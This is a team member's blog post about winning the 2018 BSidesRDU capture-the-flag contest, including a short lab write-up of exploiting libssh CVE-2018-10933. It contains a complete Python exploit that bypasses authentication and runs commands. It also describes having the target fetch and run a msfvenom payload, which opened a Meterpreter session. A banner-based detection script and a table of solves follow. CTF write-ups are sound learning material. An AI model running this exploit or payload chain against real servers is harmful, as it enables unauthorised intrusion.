2018 BSidesRDU CTF

Winner! Winner!

Welcome Thrillhouse Group took first place at the 2018 BSidesRDU CTF that was put on by Eversec CTF.

BSidesRDU Final Score Board.

Team Ntropy was in the lead for most of the day and put up a really good fight, but WTG was able to pull ahead in the last few hours and hold first place till the end. 

Our prize for taking first place was a copy of Clear and Present Danger by Tom Clancy:

 
Clear and Present Danger.

However, this is no ordinary edition! 
This copy contains what appears to be a silk-screened or possibly etched BSidesRDU 2018 flask.

BSidesRDU Flask.

The team didn't really have time to put together any write-ups for this event. We were just too busy trying to overtake Ntropy the whole day.

However, I did make some mental notes on the challenge involving the libssh vulnerability CVE-2018-10933, and still have some spool files from using Metasploit, so I'll talk about that briefly.

[1] nmap indicated libssh

Nmap scan report for 192.168.0.201
Host is up (0.00047s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     (protocol 2.0)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port22-TCP:V=7.70%I=7%D=10/19%Time=5BCA2779%P=x86_64-pc-linux-gnu%r(NUL
SF:L,16,"SSH-2\.0-libssh_0\.8\.1\r\n");
MAC Address: 02:42:C0:A8:00:C9 (Unknown)

This was the only port open on this host. Normally, OpenSSH will clearly disclose exactly what's running and we can see libssh2.0 referenced in the last line, so I threw all of the PoCs at it hoping something would stick.

Here's how that went:

[2] use auxiliary/scanner/ssh/sshlib

msf auxiliary(scanner/ssh/sshlib) > options

Module options (auxiliary/scanner/ssh/sshlib):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   RHOSTS    192.168.0.201    yes       The target address range or CIDR identifier
   RPORT     22               yes       The target port
   THREADS   1                yes       The number of concurrent threads
   USERNAME  root            yes       SSH username

msf auxiliary(scanner/ssh/sshlib) > run

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

The libssh metasploit module did not work at all. 

[3] Blackbunny PoC 

The next script I saw being passed around was from Blackbunny's github.

I first attempted the bypass script but that failed. I then fumbled with the fakekeyscript but in the end I got nowhere with either of these. 

[4] vulnhub PoC FTW!

The next PoC script I found was on vulnhub's libssh repo for CVE-2018-10933

If you follow the link and scroll down a bit you will find this script:
#!/usr/bin/env python3
import sys
import paramiko
import socket
import logging

logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
bufsize = 2048


def execute(hostname, port, command):
    sock = socket.socket()
    try:
        sock.connect((hostname, int(port)))

        message = paramiko.message.Message()
        transport = paramiko.transport.Transport(sock)
        transport.start_client()

        message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
        transport._send_message(message)

        client = transport.open_session(timeout=10)
        client.exec_command(command)

        # stdin = client.makefile("wb", bufsize)
        stdout = client.makefile("rb", bufsize)
        stderr = client.makefile_stderr("rb", bufsize)

        output = stdout.read()
        error = stderr.read()

        stdout.close()
        stderr.close()

        return (output+error).decode()
    except paramiko.SSHException as e:
        logging.exception(e)
        logging.debug("TCPForwarding disabled on remote server can't connect. Not Vulnerable")
    except socket.error:
        logging.debug("Unable to connect.")

    return None


if __name__ == '__main__':
    print(execute(sys.argv[1], sys.argv[2], sys.argv[3]))


This script worked like a champ for this challenge.

I was able to test it by starting a python webserver: # python -m SimpleHTTPServer 8080
Then I used the script to have the target run a wget command to download "test" from my webserver. I saw the attempt and at that point I knew I had RCE.

[5] Exploit

The steps to exploit were executed one at a time as my attempts to use multiple commands in a single line didn't play nice with the PoC script. 

So I used msfvenom to create A.elf and used metasploit to run a handler for the incoming connection.

I then used the PoC script to wget A.elf from my system, then I used the script to make A.elf executable on the target system, and finally I used the script to run A.elf.

The result was a meterpreter session:

Meterpreter Session.

At this point it was a simple matter of finding the flag, which if I remember correctly was in /root/flag.txt.

There are a ton of PoCs for this vuln out there now, here's another that I have saved but never got around to testing: https://github.com/SoledaD208/CVE-2018-10933
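
From the defender's side, the banner captured by the nmap scan in step [1] is enough to triage a host for CVE-2018-10933. The sketch below is an added example, not part of the original write-up or of any project's code; it relies on the upstream fix releases being libssh 0.7.6 and 0.8.4, and the function names and the extra sample banners are made up for illustration.

```python
import re

FIRST_AFFECTED = (0, 6, 0)                        # bug introduced in libssh 0.6.0
FIXED = {(0, 7): (0, 7, 6), (0, 8): (0, 8, 4)}    # upstream fix release per branch

def banner_from_nmap(fingerprint):
    """Rejoin nmap's wrapped SF lines and return the unescaped SSH banner, or None."""
    joined = "".join(re.sub(r"^SF:", "", ln.strip()) for ln in fingerprint.splitlines())
    m = re.search(r'"(SSH-[^"]*)"', joined)
    if not m:
        return None
    # nmap backslash-escapes bytes: drop \r and \n, keep any other escaped char.
    return re.sub(r"\\(.)", lambda e: "" if e.group(1) in "rn" else e.group(1), m.group(1))

def classify(banner):
    """Map an SSH identification string to a CVE-2018-10933 triage verdict."""
    # libssh2 ("libssh2_1.8.0") is a different project and does not match here.
    m = re.match(r"SSH-[\d.]+-libssh[_-](\d+)\.(\d+)\.(\d+)", banner or "")
    if not m:
        return "not-libssh"
    version = tuple(int(p) for p in m.groups())
    if version < FIRST_AFFECTED:
        return "not-affected"
    fixed = FIXED.get(version[:2])
    if version[:2] > (0, 8) or (fixed and version >= fixed):
        return "patched"
    # Banner-only verdict: distro packages may backport the fix without bumping
    # the version, and only libssh's server-side code is affected.
    return "vulnerable"

# Fingerprint lines copied from the nmap output in step [1].
PAGE_FINGERPRINT = r'''SF-Port22-TCP:V=7.70%I=7%D=10/19%Time=5BCA2779%P=x86_64-pc-linux-gnu%r(NUL
SF:L,16,"SSH-2\.0-libssh_0\.8\.1\r\n");'''

# Constructed banners for comparison (not from the page).
SAMPLES = ["SSH-2.0-libssh_0.8.4", "SSH-2.0-libssh-0.7.6", "SSH-2.0-libssh-0.6.3",
           "SSH-2.0-libssh-0.5.5", "SSH-2.0-libssh2_1.8.0", "SSH-2.0-OpenSSH_7.4"]

if __name__ == "__main__":
    page_banner = banner_from_nmap(PAGE_FINGERPRINT)
    for b in [page_banner] + SAMPLES:
        print(f"{b:28} {classify(b)}")
```

A "vulnerable" verdict from a banner is a prompt to check the installed package's changelog, since the version string alone cannot show a backported fix.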


Wrap-Up
For those that are interested, here are all of our solves:

Challenge Title  Challenge Points  Solves
droop basic  700 2
nothing.png  500 7
rc4js  475 5
hello droop  450 3
maldoc4  420 5
salesman.jpeg  400 10
libs  385 4
silky.tar  375 9
ez.tar  350 4
seequi  320 4
zip  300 3
wrblr.jar  285 5
2.txt  240 2
api  220 3
trivia 5  200 9
ftp  190 17
dir  175 9
yum  155 3
1.txt  150 5
droop3  150 5
base  140 9
strange_numbers.txt  120 18
osint 1  100 2
maldoc1  75 6
trivia 3  50 13
trivia 4  50 16
password  25 30
trivia 2  25 11
trivia 1  25 20
maldoc2  25 3
Free Twitter Flag  15 15
donut  5 1

Many thanks to the WTG members that were able to make it. We sat for a good 8 hours, ate food from a truck (though I don't think Rebecca ate at all!) ...and somehow we used up way more drink tickets than we were supposed to have.

I had a blast competing with you all by my side and I can't wait till we have an opportunity to do it again!

-strupo_

